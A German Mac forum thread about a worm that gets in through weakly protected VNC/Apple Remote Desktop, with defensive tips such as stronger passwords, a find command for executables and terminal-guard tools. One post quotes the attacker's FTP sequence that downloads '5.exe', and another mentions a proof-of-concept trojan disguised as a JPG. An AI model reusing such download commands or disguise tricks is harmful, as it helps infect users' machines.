Trojaner, Wurm entdeckt

Hi,

ich kenne das Phänomen, die Einfallslücke ist VNC. In diesem Fall vielleicht durch Apple Remote Desktop verursacht? Ein schwaches - oder gar kein? - Passwort gehören auch dazu. Dieses Passwort wurde vom Angreifer (automatisiert) geknackt und dann wird normalerweise Windows+R gesendet und das ganze eingegeben. Bei unbeaufsichtigen Rechnern hat man sich dann schnell Schadsoftware heruntergeladen.

Also: Apple Remote Desktop abschalten, auf einen anderen Port legen und/oder besseres Passwort wählen.

cu
 
sheep schrieb:
...
Und damit das jetzt nicht in ein ewiges Hin- und Her ausartet, stelle ich im Anhang meinen soeben gebastelten Proof-of-Concept-Trojaner (inkl. Deinstallations-Anleitung) zur Verfügung.

Einfach herunterladen, Archiv auspacken und JPG-Datei doppelklicken. Der Trojaner installiert sich ohne Rückfrage und schreibt fortan jede Minute den Satz "Ich bin ein OS X-Trojaner :)" in ein offenes Fenster.

Wer mutig genug oder von der Kugelsicherheit von OS X ausreichend überzeugt ist, ist herzlich eingeladen, es auszuprobieren :).

...
Zum Vergrößern anklicken....


Dein "Proof-of-Concept-Trojaner":D hat einen ein Jahr alten Bart!

https://www.macuser.de/forum/showpost.php?p=2717154&postcount=52
 

Anhänge

  • mist.jpg
    mist.jpg
    69,3 KB · Aufrufe: 296
Zuletzt bearbeitet:
MacMännchen schrieb:
edit: ach, was ich vegessen hatte, zu sagen: unter gewissen Umständen funktioniert er schon :p
Zum Vergrößern anklicken....
Kannst du nachvollziehen, welche das sind? Ich habe festgestellt, dass er trotz deaktiviertem "Universal Acess" funktioniert, aber anscheinend gibt es noch zusätzliche Voraussetzungen, die ich nicht bemerkt habe?


Und sorry wegen dem vergessenen ESC, das stimmt natürlich.

@ Ma.:
Das ist mir schon klar, aber es geht hier weniger um die Tarnung, als mehr um das, was der Trojaner macht - dass dies wiederum nichts Neues ist, ist mir ebenfalls bewusst, aber die Leute haben's ja nicht geglaubt, dass es geht ;).
 
MacMännchen schrieb:
Code: 
find . -type f -perm -0111 -print

im verdächtigen Ordner, aber das halte ich für übertrieben, da auch viele harmlose Dateien ausführbar sind.
Zum Vergrößern anklicken....

Wow, das ist ja cool :). Hat das Möchtegern-JPG sogleich zuverlässig entlarvt.

Da kommt mir doch gleich die Idee, eine Ordneraktion basierend auf diesem Befehl zu erstellen, sodass man beim Download gewarnt wird.

Du hast das nicht zufällig schon gemacht / ausprobiert?
 
sheep schrieb:
Kannst du nachvollziehen, welche das sind? Ich habe festgestellt, dass er trotz deaktiviertem "Universal Acess" funktioniert, aber anscheinend gibt es noch zusätzliche Voraussetzungen, die ich nicht bemerkt habe?
Zum Vergrößern anklicken....

das mit den "gewissen Umständen" war rein ironisch gemeint, und bezog sich auf meinen Vorredner.

@minilux
sorry, nimm's nicht persönlich. Tut mir leid, wenn ich etwas "überironisch" klang. Ich konnte mir das in dem Moment nicht verkneifen.

@sheep
Ich wüsste im Moment keine Umstände, die die Ausführung verhindern sollten, solange es erlaubt ist, das Skript auszuführen. Genauer untersuchen kann man das ja noch mal. Jedenfalls wird dein "Trojaner" sowohl unter Admin als auch unter Normaluser ausgeführt.
 
MacMännchen schrieb:
das mit den "gewissen Umständen" war rein ironisch gemeint, und bezog sich auf meinen Vorredner.
Zum Vergrößern anklicken....
Ach so, meine lange Leitung. Na dann wollen wir hoffen, dass er ihn inzwischen wieder losgeworden ist ;). Vielleicht hätte ich ja auch dazu schreiben sollen, dass es beim Öffnen des Terminals keineswegs danach aussieht, als wäre da etwas passiert...

Übrigens habe ich an einer Ordneraktion mit Automator gebastelt. Das funktioniert sogar, jetzt werde ich bei Downloads etc. gewarnt, wenn es sich um eine ausführbare Datei handelt :).
 
MacMännchen schrieb:
...
@sheep
Ich wüsste im Moment keine Umstände, die die Ausführung verhindern sollten, solange es erlaubt ist, das Skript auszuführen. Genauer untersuchen kann man das ja noch mal. Jedenfalls wird dein "Trojaner" sowohl unter Admin als auch unter Normaluser ausgeführt.
Zum Vergrößern anklicken....
Doch, kann man.

Dagegen schützt zuverlässig abmst http://www.ugsoft.de/de/abmst/index2.html.
abmst klinkt sich in jeden Terminalbefehl ein und verlangt eine Bestätigung.
In der abmst.dmg.sit ist eine Anleitung.

attachment.php

https://www.macuser.de/forum/showpost.php?p=2717154&postcount=52
 
sheep schrieb:
Übrigens habe ich an einer Ordneraktion mit Automator gebastelt. Das funktioniert sogar, jetzt werde ich bei Downloads etc. gewarnt, wenn es sich um eine ausführbare Datei handelt :).
Zum Vergrößern anklicken....

wie gesagt, es gibt (leider) auch anderen Dateien, die nach einem download ausführbar sind, z.B. harmlose PDFs o.ä. Daher ist es allein mit einer Überprüfung auf Ausführbarkeit nicht getan.
Um zuverlässigere Aussagen zu treffen, müsste man zusätzlich den Inhalt einer Datei parsen und nach "verdächtigen Einträgen" suchen. Das führt dann immer weiter, und man nähert sich langsam der Funktionsweise eines Virenscanners.
 
MacMännchen schrieb:
wie gesagt, es gibt (leider) auch anderen Dateien, die nach einem download ausführbar sind, z.B. harmlose PDFs o.ä. Daher ist es allein mit einer Überprüfung auf Ausführbarkeit nicht getan.
Um zuverlässigere Aussagen zu treffen, müsste man zusätzlich den Inhalt einer Datei parsen und nach "verdächtigen Einträgen" suchen. Das führt dann immer weiter, und man nähert sich langsam der Funktionsweise eines Virenscanners.
Zum Vergrößern anklicken....

Danke für die Erklärung, das macht das Ganze natürlich unpraktisch.

Ausserdem ist die von Ma. verlinkte Lösung sowieso viel besser geeignet, das ist echt ein super Tipp! Habe das gerade installiert, es hat keinerlei Nebenwirkungen, wenn man das Terminal normal verwendet.
 
Ma. schrieb:
Doch, kann man.
Zum Vergrößern anklicken....

danke für den Tipp :)

ich hatte den sogar schon mal runtergeladen, aber glattweg vergessen.

Ok, damit erscheint die Abfrage, und die verhindert tatsächlich erst mal die Ausführung. Wer dann nicht stutzig wird...
 
habe den gleichen Wurm / Trojaner... seit mehr als 2 Monaten

Hi,
hier mal ein Auszug von dem, was er mir so ausspuckt:

open 0.0.0.0 40623 .. ik 7echo user 0rbipwn 03rbbiipwn93 .. ik 7echo get 5.exe .. ik 7e

Ich habe Adium installiert, aber keine apple remote gestartet.
ciao
Thomas
 
Bei mir lief VNC auf dem Standard Port mit nem super low Passwort :Oldno:
 
was ist das ergebnis nun? :)
ich hatte das problem auch einmal, hing mit vnc zusammen, als ich den port geändert habe, trat es nicht mehr auf. scheint eine vnc lücke oder was auch immer zu sein. ich glaube nicht das es mit dem passwort zusammenhängt! ich verwenden sehr lange und sichere passwörter.
gerade heute trat das problem bei einem kollegen von mir auf.
er hat auch adium und remote desktop aktiviert (standart-port) ....
ist echt nervig .. noch immer keine lösung? remote desktop client auf dem neusten stand .. port lässt sich wegen eines schlechten routers so nicht einfach ändern. da gibts nur abschalten leider so wie ich das sehe ...
 
Ich habe ClamxAV drüber gejagt.
Das Programm ist auch einmal angeschlagen. Ich weiß nicht sicher ob es ein Wurm, Virus o.Ä war. Die Datei wurde jedenfalls entfernt und das Problem ist nie wieder aufgetreten.
 
Fehlerbehebung

Ihr habt VNC-Server drauf, oder etwas ähnliches, das müsst ihr mal mit einem sicheren Passwort versehen. Es gibt einen 'Virus' der alle Rechner am Port 5900 anpingt und mit einem einfachen Passwort versucht, auf das System zuzugreifen.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben Unten